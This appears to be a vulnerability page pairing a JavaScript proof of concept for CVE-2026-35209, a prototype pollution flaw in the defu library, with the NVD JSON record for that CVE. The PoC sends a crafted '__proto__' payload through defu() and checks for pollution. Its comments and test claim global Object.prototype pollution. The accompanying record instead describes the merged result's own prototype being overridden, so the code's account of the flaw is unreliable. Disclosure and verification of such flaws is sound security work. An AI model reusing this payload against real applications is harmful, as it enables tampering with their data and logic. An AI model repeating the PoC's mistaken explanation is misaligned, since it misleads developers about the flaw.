CVE-2026-35209

// PoC for CVE-2026-35209 (Prototype Pollution in defu < 6.1.5) // This demonstrates how a crafted payload can pollute the object prototype. const { defu } = require('defu'); // Assuming vulnerable version < 6.1.5 console.log("Testing CVE-2026-35209..."); // 1. Craft a malicious payload containing '__proto__' // This payload intends to inject a property 'isPolluted' into Object.prototype const maliciousInput = JSON.parse('{"__proto__": {"isPolluted": true}}'); // 2. Define default options const defaults = { setting1: "value1", setting2: "value2" }; // 3. Call defu with unsanitized user input (maliciousInput) // In vulnerable versions, the internal _defu function uses Object.assign({}, defaults) // which invokes the __proto__ setter. const mergedResult = defu(maliciousInput, defaults); // 4. Verify the prototype pollution // Create an empty object. If polluted, it should inherit 'isPolluted'. const checkObj = {}; if (checkObj.isPolluted === true) { console.log("[SUCCESS] Vulnerability confirmed! Object.prototype is polluted."); console.log("Empty object property 'isPolluted':", checkObj.isPolluted); } else { console.log("[FAIL] Vulnerability not triggered or patched."); } // Output the merged result to see the structure console.log("Merged Result:", mergedResult);

{"cve": {"id": "CVE-2026-35209", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:44.157", "lastModified": "2026-04-27T23:47:57.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "defu is software that allows uers to assign default properties recursively. Prior to version 6.1.5, applications that pass unsanitized user input (e.g. parsed JSON request bodies, database records, or config files from untrusted sources) as the first argument to `defu()` are vulnerable to prototype pollution. A crafted payload containing a `__proto__` key can override intended default values in the merged resul. The internal `_defu` function used `Object.assign({}, defaults)` to copy the defaults object. `Object.assign` invokes the `__proto__` setter, which replaces the resulting object's `[[Prototype]]` with attacker-controlled values. Properties inherited from the polluted prototype then bypass the existing `__proto__` key guard in the `for...in` loop and land in the final result. Version 6.1.5 replaces `Object.assign({}, defaults)` with object spread (`{ ...defaults }`), which uses `[[DefineOwnProperty]]` and does not invoke the `__proto__` setter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:unjs:defu:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "6.1.5", "matchCriteriaId": "8AEDDCDC-B8A2-4F55-8E3C-6CDC5843122B"}]}]}], "references": [{"url": "https://github.com/unjs/defu/commit/3942bfbbcaa72084bd4284846c83bd61ed7c8b29", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/unjs/defu/pull/156", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/unjs/defu/releases/tag/v6.1.5", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/unjs/defu/security/advisories/GHSA-737v-mqg7-c878", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}